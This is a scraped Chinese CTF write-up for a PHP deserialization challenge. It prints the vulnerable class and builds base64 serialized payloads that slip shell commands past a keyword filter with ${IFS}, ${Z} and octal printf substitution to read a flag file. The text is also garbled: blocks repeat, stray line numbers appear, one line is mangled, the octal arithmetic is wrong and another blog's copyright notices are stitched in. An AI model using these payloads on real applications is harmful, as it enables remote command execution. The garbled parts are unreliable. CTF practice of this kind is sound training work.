攻防世界-unseping

攻防世界-unseping

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iPc18GlQ-1666931905094)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAAEKADAAQAAAABAAAAEAAAAAA0VXHyAAAB+ElEQVQoFS2SuY7CQBBE8XjMYXMfu6wQIgOJCAmRkBAh/pLfICABEUAIIQEJ4hL3bQ4b9rHeDtrTdk11dbWVer2uqqqiuHw+PRwOh0KhYDDo9Xpt297tdpvNZrVaHY/Hx+Pxfr+fz6d0uVw305RSGLpxN80D5e2maZplWefz2YFy5gCRrusSelsoX98/msZZut1u0FLK1+vFJ84ej0dRFErDMOLxuOQR8gdBWBYqXvSlp9P9/hfI4E0ikYjFYslkUqL7er2CAE6GiYwG0zSRQaaP7y9Ap9Pp/wun04mx+AaaQMPlcgHNzUgkggfEZwACW8bjcSaToW61WtFoNJ/Pd7vdWq3G0Aza6/WQQGdIyZJujiFIRN56vT4cDsVisdlscoC4Wq02Gg14P/bYtlgulzDRHUQul0MYJSy8J8MqhPjghKCEUYxGI6cjDnY6nUqlwh7m83kgEKAbL1kfI0GPhGw2K5kdAuxnhul0OhwOgfb7/VKpBBGS2u02ONRjrt/vVyaTyWAwgGy/3zMMZLDSnT7odByHjnUVCoVUKiW32y0/DFohoAl7BQ2CpYGmZCp2x32QaFHL5fJisWAmAm6ggFBMiQwQBAf8JbMcOZvNnGWBwwTWREa64zU6GRoc9x1vJHOwPmTgND7we7E7LsCHTtBw84+AhgJhvzqqhewBzcvrAAAAAElFTkSuQmCC)]GFSJ1061积分1金币1

18最佳Writeup由 shuita111 提供WriteUP

收藏

反馈

难度：1

方向：Web

题解数：1

解出人数：255

题目来源: 江苏工匠杯

题目描述:

unseping

题目场景:

http://61.147.171.105:62407

100%

倒计时: 3时42分15秒

highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

// $ctf=@$_POST['ctf'];
// @unserialize(base64_decode($ctf));

$obj=new ease("ls","ls //");
$str=serialize($obj);
echo $str,PHP_EOL;
$str=str_replace('O:4','O:+4',$str);
$str=str_replace(':2:',':3:',$str);
echo $str;
echo base64_encode($str);

//--------------------------------
echo "
";
//$a=new ease("ping",array('test point'));
$a= new ease("ping",array('pwd'));
$b=serialize($a);
echo $b;
echo base64_encode($b);

?>
  
  
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

$a = new ease("ping",array('l${Z}s'));
$b=serialize($a);
echo $b;
echo base64_encode($b);

?>
//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtafXMiO319

1
2
3
4
5
6
7
8

$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));
$b=serialize($a);
echo $b;
echo base64_encode($b);

//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
1
2
3
4
5
6

flag_1s_here/flag_831b69012c67b35f.php

访问空白！

貌似是uncode编码$(printf “\154\163”) 但是好像并不是unicode编码

\154\163怎么就能代替ls了！？

印象中“\”开头的是八进制 这会不会是assic码

\154=4+58+18^2=4+40+64=108 对应assic码”l“

\163=3+68+18^2=3+48+64=115 对应assic码”s“

根据这个思路我写了一个c语言的代码

#include 
int main()
{
    /* code */
    char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";
    for (int i = 0; i < sizeof site / sizeof site[0]; i++) {
        printf("\\%o",site[i]);
    }
    return 0;
}
1
2
3
4
5
6
7
8
9
10

————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541

#/usr/bin/python3
#     /* code */
#     char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";

s="cat flag_1s_here/flag_831b69012c67b35f.php"
s1=''
#用于得到字符对应的ASCII码，返回值类型为int型
#01-chr()：功能：用于将数 (十进制数、二进制数、八进制数或十六进制数) 转化为其对应的字符。比如：
for i in s:
    print(oct(ord(i)))
    s1=s1+'\\'+str(oct(ord(i)))[2:]

print(s1)   
    
    
#运行结果
┌──(kwkl㉿kwkl)-[~/HODL]
└─$ /bin/python3 /home/kwkl/HODL/adworld/web/unseping/c.py
0o143
0o141
0o164
0o40
0o146
0o154
0o141
0o147
0o137
0o61
0o163
0o137
0o150
0o145
0o162
0o145
0o57
0o146
0o154
0o141
0o147
0o137
0o70
0o63
0o61
0o142
0o66
0o71
0o60
0o61
0o62
0o143
0o66
0o67
0o142
0o63
0o65
0o146
0o56
0o160
0o150
0o160
\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

$(printf “\154\163”)

组合一个poc：

$(printf “\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)

$a=newease("ping",array{(}^{\prime }l${Z}s$IFSf${Z}lag_1${Z}s_here’));

$a=newease("ping",array{(}^{\prime }l${Z}s$IFSf${Z}lag_1${Z}s_here’));

$a=newease("ping",array{(}^{\prime }$(printf${IFS}“\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)'));
————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541

highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

// $ctf=@$_POST['ctf'];
// @unserialize(base64_decode($ctf));

$obj=new ease("ls","ls //");
$str=serialize($obj);
echo $str,PHP_EOL;
$str=str_replace('O:4','O:+4',$str);
$str=str_replace(':2:',':3:',$str);
echo $str;
echo base64_encode($str);

//--------------------------------
echo "
";
//$a=new ease("ping",array('test point'));
//$a= new ease("ping",array('pwd'));
//$a = new ease("ping",array('l${Z}s'));
//$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));
$a = new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));

$b=serialize($a);
echo $b;
echo base64_encode($b);

?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319

一定要用post方法！

ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319
————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541

————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541